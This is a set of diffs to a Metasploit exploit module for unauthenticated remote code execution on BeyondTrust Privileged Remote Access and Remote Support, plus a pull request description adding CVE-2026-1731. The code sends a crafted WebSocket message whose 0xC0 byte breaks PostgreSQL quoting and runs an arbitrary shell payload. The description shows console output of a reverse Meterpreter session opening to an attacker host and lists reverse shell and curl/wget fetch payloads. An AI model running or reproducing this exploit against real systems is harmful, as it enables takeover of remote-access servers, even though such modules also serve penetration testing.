+      vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
 
-      # Transmit a random UUID value for the 'thin mint' cookie value.
-      wsock.put_wstext("#{SecureRandom.uuid}\n")
-
-      # Transmit the auth type we want. Zero is the gskey auth type.
-      wsock.put_wstext("0\n")
-
-      # NOTE: We can bypass the need to leverage the argument injection CVE-2024-12356, by transmitting the malicious gskey
-      # value via a binary WebSocket message, instead of a text WebSocket message. We include a module option (false by
-      # default) called 'LeverageCVE_2024_12356' to make this exploit leverage the argument injection CVE-2024-12356.
-
-      if target.name.include? 'CVE-2024-12356'
-        vprint_status('Leveraging CVE-2024-12356 to trigger the SQLi (CVE-2025-1094)...')
-
-        # Transmit the malicious gskey value and exploit the argument injection vulnerability.
-        # Our attacker value will be passed to the echo command, but as a variable, not as a string. We can therefore pass
-        # arbitrary arguments to echo (CVE-2024-12356). We pass the -e switch, to enable the interpretation of backslash
-        # escape sequences. We leverage this to pass an 0xC0 character, this will break the interpretation of a
-        # PostgreSQL statement (CVE-2025-1094), and in turn allow us to overcome the safe quotes that have been put in
-        # place. We can escape the current SQL statement and run an arbitrary PostgreSQL client meta-command. By running
-        # a \! meta-command, we can execute and arbitrary shell command.
-        wsock.put_wstext("-e \\\\xC0'; \\\\! #{payload.encoded} #\n")
-      else
-        vprint_status('Triggering the SQLi (CVE-2025-1094) directly (Without CVE-2024-12356)...')
-
-        # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
-        # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
-        wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
-      end
+      # Leverage the SQLi (CVE-2025-1094) directly, by placing the raw byte value 0xC0 in the gskey value that
+      # we send to the server. We can do this if we send a WebSocket binary message instead of a WebSocket text message.
+      wsock.put_wsbinary("\xC0'; \\\\! #{payload.encoded} #\n")
     end
 
-    # The vendor patch BT24-10-ONPREM1 (and subsequent patches) will detect a malformed gskey value, and terminate the
-    # thin-scc-wrapper script early, tearing down the WebSocket connection. We can detect this here and warn the user
-    # that the target may actually be patched. As the patch does not change the servers version number, we cannot
-    # detect the patch via a version based check.
+    # The vendor patch BT24-10-ONPREM1 will detect a malformed gskey value, and terminate the thin-scc-wrapper script
+    # early, tearing down the WebSocket connection. We can detect this here and warn the user that the target may
+    # actually be patched. As the patch does not change the servers version number, we cannot detect the patch via a
+    # version based check.
     while wsock.has_read_data? datastore['WFSDELAY']
       frame = wsock.get_wsframe
 
       break if frame.nil?
 
       if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
-        print_warning('WebSocket closed unexpectedly! This may indicate that a patch has been applied, and the target is no longer vulnerable.')
+        print_warning('WebSocket closed unexpectedly! This indicates that the patch BT24-10-ONPREM1 has been applied, and the target is no longer vulnerable.')
         break
       end
     end
@@ -363,104 +191,4 @@ class MetasploitModule < Msf::Exploit::Remote
     raise
   end
 
-  # We need to know the target sites company name, or FQDN, in order to successfully establish a WebSocket connection.
-  # We first favor the user setting either the TargetCompanyName or TargetServerFQDN options. If not set we then try
-  # an undocumented API endpoint /get_mech_list, that should return the target site company name. Finally, we fall
-  # back on the /download_client_connector endpoint which will also report a servername and site FQDN.
-  def get_site_info
-    if !datastore['TargetCompanyName'].blank? || !datastore['TargetServerFQDN'].blank?
-      return {
-        company: datastore['TargetCompanyName'],
-        server: datastore['TargetServerFQDN']
-      }
-    end
-
-    site_info = get_site_info_via_mech_list
-
-    return site_info unless site_info.nil?
-
-    get_site_info_via_download_client_connector
-  end
-
-  # An internal un-documented API located at the /get_mech_list endpoint will return a JSON object that
-  # contains the company name of the target site.
-  def get_site_info_via_mech_list
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'get_mech_list'),
-      'vars_get' => {
-        'version' => '3'
-      },
-      'headers' => {
-        'Accept' => 'application/json'
-      }
-    )
-
-    return error('get_site_info_via_mech_list Connection failed.') unless res
-
-    return error("get_site_info_via_mech_list Request unexpected response code #{res.code}.") unless res.code == 200
-
-    json_data = res.get_json_document
-
-    company = json_data['company']
-
-    return error('get_site_info_via_mech_list company not found.') if company.blank?
-
-    vprint_status('Got site info via the /get_mech_list endpoint.')
-
-    { company: company, server: nil }
-  end
-
-  def get_site_info_via_download_client_connector
-    res1 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'download_client_connector'),
-      'vars_get' => {
-        'issue_menu' => '1'
-      }
-    )
-
-    return error('get_site_info Connection 1 failed.') unless res1
-
-    return error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
-
-    return error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
-
-    res2 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
-    )
-
-    return error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
-
-    return error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
-
-    return error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
-
-    company = Rex::Text.html_decode(::Regexp.last_match(1))
-
-    return error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
-
-    servers = Rex::Text.html_decode(::Regexp.last_match(1))
-
-    servers_array = JSON.parse(servers)
-
-    return error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
-
-    return error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
-
-    server = servers_array.first
-
-    vprint_status('Got site info via the /download_client_connector endpoint.')
-
-    { company: company, server: server }
-  rescue JSON::ParserError
-    error('get_site_info_via_download_client_connector JSON parse error.')
-  end
-
-  # Helper method to print an error and then return nil.
-  def error(message)
-    print_error(message)
-    nil
-  end
 end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -289,7 +289,7 @@ class MetasploitModule < Msf::Exploit::Remote
       break if frame.nil?
 
       if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
-        print_warning('WebSocket closed unexpectedly! This indicates that the patch BT24-10-ONPREM1 has been applied, and the target is no longer vulnerable.')
+        print_warning('WebSocket closed unexpectedly! This may indicate that a patch has been applied, and the target is no longer vulnerable.')
         break
       end
     end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HTTP::Beyondtrust
   include Msf::Exploit::Remote::HttpClient
   include Rex::Proto::Http::WebSocket
   prepend Msf::Exploit::Remote::AutoCheck
@@ -114,10 +113,61 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    product_version = get_version
-    return CheckCode::Unknown unless product_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'get_rdf'),
+      'vars_get' => {
+        'comp' => 'sdcust',
+        'locale_code' => 'en-us'
+      }
+    )
 
-    product_version = Rex::Version.new(product_version)
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
+
+    # The HTTP content data will have something like this, followed by ~800Kb of string data:
+
+    # 00000000  30 20 53 75 63 63 65 73 73 66 75 6c 0a 65 6e 2d  |0 Successful.en-|
+    # 00000010  75 73 0a 31 37 33 37 33 36 38 38 37 32 0a 42 52  |us.1737368872.BR|
+    # 00000020  44 46 80 00 0a 91 07 81 32 34 2e 31 2e 32 00 82  |DF......24.1.2..|
+    # 00000030  00 00 00 00 67 8e 25 28 91 06 83 65 6e 2d 75 73  |....g.%(...en-us|
+
+    # First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we use a regex to match this so we can ignore it.
+
+    header = res.body.match(/^(0 Successful\n.+\n\d+\n)/)
+
+    return CheckCode::Unknown('Unexpected response header') unless header
+
+    # Extract the remainder of the data, after the "0 Successful\nLOCALE_ID\nTIMESTAMP\n" pre-amble.
+    brdf_data = res.body[header[1].length..]
+
+    return CheckCode::Unknown('Unexpected response data') unless brdf_data.include? 'Thank you for using BeyondTrust'
+
+    # Pull out the magic value (4 bytes), the first tag and its value (file version, 3 bytes), and then the second tag
+    # and its value (product version). The product version is encoded as a string, so has two tags, one for the
+    # string type (0x91) and the other for the tag type (0x81).
+    magic, _, _, prod_version_tag1, file_version_data_len, file_version_tag2 = brdf_data.unpack('NCvCCC')
+
+    # Inspect the data to ensure it looks like what we expect.
+
+    return CheckCode::Unknown('Unexpected header magic') unless magic == 0x42524446 # BRDF
+
+    return CheckCode::Unknown('Unexpected header prod_version_tag1') unless prod_version_tag1 == 0x91 # RDF_SMALL_SIZE
+
+    return CheckCode::Unknown('Unexpected header file_version_tag2') unless file_version_tag2 == 0x81 # RDF_PRODUCT_VERSION
+
+    product_version = brdf_data[10, file_version_data_len - 1]
+
+    # We cannot differentiate between the two affected products, Privileged Remote Access (PRA) and Remote Support (RS).
+    # However, they both share a common version number, and a common patch for this vulnerability.
+    #
+    # Note #1: The vendor advisory only states that versions "24.3.1 and earlier" are affected, so we do not have a lower
+    # bound version number to test against.
+    #
+    # Note #2: The vendor supplied a patch (BT24-10-ONPREM1 or BT24-10-ONPREM2) to remediate the issue, in lieu of an
+    # updated product release. This patch does not change the products version number, so we cannot tell via a version
+    # based check if a target is actually vulnerable, therefore we can only report CheckCode::Appears.
     if Rex::Version.new(product_version) <= Rex::Version.new('24.3.1')
 
     res = send_request_cgi(
@@ -313,4 +363,104 @@ class MetasploitModule < Msf::Exploit::Remote
     raise
   end
 
+  # We need to know the target sites company name, or FQDN, in order to successfully establish a WebSocket connection.
+  # We first favor the user setting either the TargetCompanyName or TargetServerFQDN options. If not set we then try
+  # an undocumented API endpoint /get_mech_list, that should return the target site company name. Finally, we fall
+  # back on the /download_client_connector endpoint which will also report a servername and site FQDN.
+  def get_site_info
+    if !datastore['TargetCompanyName'].blank? || !datastore['TargetServerFQDN'].blank?
+      return {
+        company: datastore['TargetCompanyName'],
+        server: datastore['TargetServerFQDN']
+      }
+    end
+
+    site_info = get_site_info_via_mech_list
+
+    return site_info unless site_info.nil?
+
+    get_site_info_via_download_client_connector
+  end
+
+  # An internal un-documented API located at the /get_mech_list endpoint will return a JSON object that
+  # contains the company name of the target site.
+  def get_site_info_via_mech_list
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'get_mech_list'),
+      'vars_get' => {
+        'version' => '3'
+      },
+      'headers' => {
+        'Accept' => 'application/json'
+      }
+    )
+
+    return error('get_site_info_via_mech_list Connection failed.') unless res
+
+    return error("get_site_info_via_mech_list Request unexpected response code #{res.code}.") unless res.code == 200
+
+    json_data = res.get_json_document
+
+    company = json_data['company']
+
+    return error('get_site_info_via_mech_list company not found.') if company.blank?
+
+    vprint_status('Got site info via the /get_mech_list endpoint.')
+
+    { company: company, server: nil }
+  end
+
+  def get_site_info_via_download_client_connector
+    res1 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'download_client_connector'),
+      'vars_get' => {
+        'issue_menu' => '1'
+      }
+    )
+
+    return error('get_site_info Connection 1 failed.') unless res1
+
+    return error("get_site_info Request 1, unexpected response code #{res1.code}.") unless res1.code == 200
+
+    return error('get_site_info_via_download_client_connector Request 1, unable to match data-html-url') unless res1.body =~ %r{data-html-url="\S+(/chat/html/\S+)"}i
+
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.html_decode(::Regexp.last_match(1)))
+    )
+
+    return error('get_site_info_via_download_client_connector Connection 2 failed.') unless res2
+
+    return error("get_site_info_via_download_client_connector Request 2, unexpected response code #{res2.code}.") unless res2.code == 200
+
+    return error('get_site_info_via_download_client_connector Request 2, unable to match data-company.') unless res2.body =~ /data-company="(\S+)"/i
+
+    company = Rex::Text.html_decode(::Regexp.last_match(1))
+
+    return error('get_site_info_via_download_client_connector Request 2, unable to match data-servers.') unless res2.body =~ /data-servers="(\S+)"/i
+
+    servers = Rex::Text.html_decode(::Regexp.last_match(1))
+
+    servers_array = JSON.parse(servers)
+
+    return error('get_site_info_via_download_client_connector Request 2, data-servers not a valid array.') unless servers_array.instance_of? Array
+
+    return error('get_site_info_via_download_client_connector Request 2, data-servers is an empty array.') if servers_array.empty?
+
+    server = servers_array.first
+
+    vprint_status('Got site info via the /download_client_connector endpoint.')
+
+    { company: company, server: server }
+  rescue JSON::ParserError
+    error('get_site_info_via_download_client_connector JSON parse error.')
+  end
+
+  # Helper method to print an error and then return nil.
+  def error(message)
+    print_error(message)
+    nil
+  end
 end

--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-12356'], # Argument injection in BeyondTrust (may be combined with CVE-2025-1094)
           ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt26-02'], # Vendor advisory for CVE-2026-1731
           ['URL', 'https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # Vendor advisory for CVE-2024-12356
-          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advis:ory for CVE-2025-1094
+          ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # Vendor advisory for CVE-2025-1094
           ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis (CVE-2024-12356 / CVE-2025-1094)
           ['URL', 'https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis'] # Rapid7 Analysis (CVE-2026-1731)
         ],


### PR DESCRIPTION
## Description

This Pull Request adds support for **CVE-2026-1731**, a critical pre-authentication OS command injection vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS).

To accommodate this, the module has been refactored into a **multi-target structure**. The new 2026 Bash arithmetic evaluation injection is set as the default target, while legacy support for the CVE-2025-1094 (SQLi) and CVE-2024-12356 (Argument Injection) chain has been preserved and verified.

### Key Changes:

* **New Target**: Added `CVE-2026-1731 (Command Injection)` as Target 0.
* **Refactored Handshake**: Implemented a target-specific WebSocket handshake to handle the different injection points (remoteVersion vs. gskey).
* **Refined Check Method**: Optimized the version-based check for CVE-2026-1731 to cover the maximum vulnerable range (<= 25.3.1). Since RS and PRA branches overlap and cannot be distinguished via the RDF header, this ensures vulnerable Remote Support (RS) instances on the 24.x branch are correctly identified rather than being missed by branch-specific cut-offs.
* **Renamed Error Handler**: Resolved a conflict with internal error class by changing `error` helper function to `module_error`, preventing "invalid number of arguments" error with stack trace from displaying in some cases.

---

## Verification Steps

1. Start `msfconsole`.
2. `use exploit/linux/http/beyondtrust_pra_rs_unauth_rce`.
3. `set RHOSTS <TARGET_IP>`.
4. **Test Target 0 (Default)**:
	* `set target 0`
	* `exploit`
	* **Verify** unauthenticated RCE on a vulnerable BeyondTrust 2026 instance.

```bash
[*] Started reverse TCP handler on 192.168.80.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: REDACTED
[*] Sending stage (3090404 bytes) to 192.168.80.129
[*] Meterpreter session 1 opened (192.168.80.130:4444 -> 192.168.80.129:41444) at 2026-02-17 10:34:07 +0000
```

5. **Test Legacy Targets**:
	* `set target 1` (or 2)
	* `exploit`
	* **Verify** successful exploitation on older 24.3.1 instances to ensure no regressions.

6. **Verify Payload Delivery**: Tested and confirmed success using both `curl` and `wget` fetch methods.

---

## Targets Tested

* BeyondTrust Remote Support (RS) / PRA: Verified against ERS 24.1.2 (Vulnerable).

## Payloads Verified

Confirmed working with the following:

* `cmd/linux/http/x64/meterpreter/reverse_tcp`
* `cmd/unix/reverse_bash`
* `cmd/unix/generic`

---

## Status

* [x] `msftidy.rb` checks passed locally.
* [x] All technical comments regarding `pg_escape_string` and WebSocket patch detection are preserved.
* [x] Verified that `remoteGsKey` randomization (4-8 alphanumeric chars) does not interfere with the 2026 exploit path.